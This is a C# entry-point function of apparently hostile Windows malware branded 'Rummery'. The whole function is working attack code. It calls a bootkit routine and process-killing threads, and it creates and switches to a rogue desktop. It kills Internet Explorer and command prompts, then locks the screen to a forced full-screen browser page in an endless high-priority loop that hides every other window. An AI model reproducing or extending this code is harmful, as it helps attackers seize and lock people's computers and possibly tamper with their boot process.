static void Main(string[] args)
{
fork();
//unlink_psexec();
new Thread(killthread).Start();
bootkit();
//bsod();
External.Invincible();
whatTemp();
populateImages();
new Thread(bkthread).Start();
new Thread(drawOnWindows).Start();
new Thread(drawall).Start();
new Thread(sdraws).Start();
new Thread(sdrawthread).Start();
setDesktop();
var ptr = External.OpenDesktop("Rummery", 0, false, (uint)DESKTOP_ACCESS.GENERIC_ALL);
if (ptr == IntPtr.Zero)
{
ptr = External.CreateDesktop("Rummery", IntPtr.Zero, IntPtr.Zero, 0, (uint)DESKTOP_ACCESS.GENERIC_ALL, IntPtr.Zero);
}
External.SwitchDesktop(ptr);
forceNavigate();
spawnLockIE("Winlogon");
//spawnLockIE("Rummery");
setIETitle();
//External.LockWorkStation();
Console.ForegroundColor = ConsoleColor.Green;
Console.Write(
@" RUMMERY!!
. . ________________ . .
. ____/ ( ( ) ) \___
. /( ( ( ) _ )) ) )\ . .
(( ( )( ) ) ( ) ) .
. . ((/ ( _( ) ( _) ) ( () ) )_ . .
(( f) u ( c k ( 2) h )e )c.t)o(r )_
##### #### ### ### ###### ( _) #### # # ###### #####
# # # # # # # ) # # # # # # #
# ### ###### # # # ###### ) ( # # # # ###### #####
# # # # # # # # ( _ # # # # # # #
##### # # # # # ###### _ ) #### # ###### # # `
. . (_((__(_(__(( ( ( | ) ) ) )_))__))_)___) .
. ((__) \\||lll|l||/// \_)) .
. . / ( |(||(|)|||// \ . . . .
. . . ( /(/ ( ) ) )\ . .
. . . ( . ( ( ( | | ) ) )\ ) .
( /(| / ( )) ) ) )) ) . . . . . .
. . . . ( . ( ((((_(|)_))))) ) .
. . ( . ||\(|(|)|/|| . . ) . .
. . ( . |(||(||)|||| . ) . . . .
. . . ( //|/l|||)|\\ \ ) . . .
(/ / // /|//||||\\ \ \ \ _)
Interpreting docs with malicious intent since '11");
Console.WriteLine();
var ident = System.Security.Principal.WindowsIdentity.GetCurrent().Name + "@" +
Environment.MachineName +
": " + Environment.OSVersion.VersionString.Replace("Microsoft Windows ", "");
Console.Title = "SALAMANDERS! " + ident;
Process.GetProcesses().Where(
p => p.ProcessName == "iexplore" || p.ProcessName == "cmd"
).ToList().ForEach(
p => p.Kill()
);
//Thread.Sleep(5000);
while (true)
{
var processes = Process.GetProcesses();
if (
processes.Select(p => p.ProcessName).Contains("iexplore") &&
processes.Select(p => p.MainWindowTitle).Any(t => t.Contains("police-polecat-13066"))
)
{
//var proc = processes.First(p => p.MainWindowTitle.Contains("police-polecat-13066"));
//Program.SetWindowPos(
// proc.MainWindowHandle, new IntPtr(-1), 0, 0, 0, 0, 0x0002 | 0x0001
//);
foreach (var proc in processes)
{
if (proc.MainWindowTitle.Contains("police-polecat-13066") || proc.MainWindowTitle.Contains("Mess with the best"))
{
//-1: Send to front, position 0,0, size (ignored) 0x0 due to, 0x0001: SWP_NOSIZE
External.SetWindowPos(proc.MainWindowHandle, new IntPtr(-1), 0, 0, 0, 0, 0x0001);
}
else
{
//1: Send to back, reposition to 3000,0, resize to 0x0, hide window
External.SetWindowPos(proc.MainWindowHandle, new IntPtr(1), 3000, 0, 0, 0, 0x0080);
}
}
}
else
{
var pInfo = new ProcessStartInfo(
"iexplore.exe", "-nomerge " + hPath
);
pInfo.WindowStyle = ProcessWindowStyle.Maximized;
var p = new Process();
p.StartInfo = pInfo;
p.Start();
}
processes.Where(
p => !p.MainWindowTitle.Contains("police-polecat-13066") &&
p.ProcessName != "iexplore"
).ToList().ForEach(p => External.ShowWindow(p.MainWindowHandle, 11));
External.SwitchDesktop(ptr);
Process.GetCurrentProcess().PriorityClass = ProcessPriorityClass.High;
Process.GetCurrentProcess().PriorityBoostEnabled = true;
forceNavigate();
spawnLockIE("Winlogon");
//spawnLockIE("Rummery");
setIETitle();
setDesktop();
Thread.Sleep(2000);
}
}
